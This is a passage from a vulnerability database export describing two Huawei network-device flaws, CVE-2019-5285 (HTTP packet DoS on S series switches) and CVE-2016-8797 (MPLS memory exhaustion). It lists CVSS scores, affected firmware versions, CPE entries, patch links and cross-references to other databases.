                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-156720",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2019-5285",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2019-5285",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2019-25515",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201905-947",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-156720",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Some Huawei S series switches have a DoS vulnerability. An unauthenticated remote attacker can send crafted packets to the affected device to exploit this vulnerability. Due to insufficient verification of the packets, successful exploitation may cause the device reboot and denial of service (DoS) condition. (Vulnerability ID: HWPSIRT-2019-03109). Vendors have confirmed this vulnerability HWPSIRT-2019-03109 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiS12700 is an enterprise-class switch product from China's Huawei company. The vulnerability stems from the program's insufficient verification of specific parameters of Http messages. The following products and versions are affected: Huawei S12700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R010C00 Version, V200R012C00 Version, V200R013C00 Version, V200R011C10 Version; S1700 V200R008C00 Version, V200R009C00 Version, V200R010C00 Version, V200R011C10 Version, V200R012C00 Version, V200R013C00 version; S2300 V200R003C00 version, etc",
      sources: [
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2019-5285",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   id: "VAR-201906-0055",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
      ],
      trust: 1.49839577625,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
      ],
   },
   last_update_date: "2023-12-18T13:02:13.082000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20190522-01-switch",
            trust: 0.8,
            url: "https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
         },
         {
            title: "Multiple HuaweiS series switches enter patches for verification error vulnerabilities",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/172831",
         },
         {
            title: "Multiple Huawei S Repair measures for series switch security vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92902",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 3.4,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20190522-01-switch-en",
         },
         {
            trust: 1.8,
            url: "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20190522-01-switch-cn",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2019-5285",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5285",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2019-08-02T00:00:00",
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            date: "2019-06-04T00:00:00",
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            date: "2019-06-17T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            date: "2019-06-04T19:29:00.477000",
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            date: "2019-05-22T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2019-08-02T00:00:00",
            db: "CNVD",
            id: "CNVD-2019-25515",
         },
         {
            date: "2019-07-26T00:00:00",
            db: "VULHUB",
            id: "VHN-156720",
         },
         {
            date: "2019-06-17T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
         {
            date: "2019-07-26T11:15:11.877000",
            db: "NVD",
            id: "CVE-2019-5285",
         },
         {
            date: "2019-07-29T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei S Series switch vulnerability in input confirmation",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2019-005143",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201905-947",
         },
      ],
      trust: 0.6,
   },
}

var-201704-0422
Vulnerability from variot

Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion. The Huawei AR3200 is a Huawei router. The S9700, S5300, S5700, S6300, S6700, S7700, S9300, and S9700 are Huawei switch devices. A number of Huawei products have a memory leak vulnerability. The Multi-Protocol Labeling (MPLS) packet processing module of the device repeatedly requests the memory when processing abnormal packets. There is a risk that the continuous attack will cause the memory to run out. An attacker could exploit this vulnerability to cause the device to run out of memory. The Huawei AR3200 and others are all products of China's Huawei (Huawei). The following products are affected: Huawei AR3200 V200R007C00 Version, V200R005C32 Version, V200R005C20 Version; S12700 V200R008C00 Version, V200R007C00 Version; S5300 V200R008C00 Version, V200R007C00 Version, V200R006C00 Version; S5700 V200R008C00 Version, V200R007C00 Version, V200R006C00 Version; S6300 V200R008C00 Version, V200R007C00 Version; S6700 V200R008C00 version, V200R007C00 version; S7700 V200R008C00 version, V200R007C00 version, V200R006C00 version; S9300 V200R008C00 version, V2007C00 version, V200R006C00 version;

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0422",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c32",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c20",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s12700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "ar3200",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200 v200r005c32",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar3200 v200r005c20",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s12700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s9700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11302",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008269",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201704-187",
         },
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c32:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:ar3200_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-8797",
         },
      ],
   },
   cve: "CVE-2016-8797",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
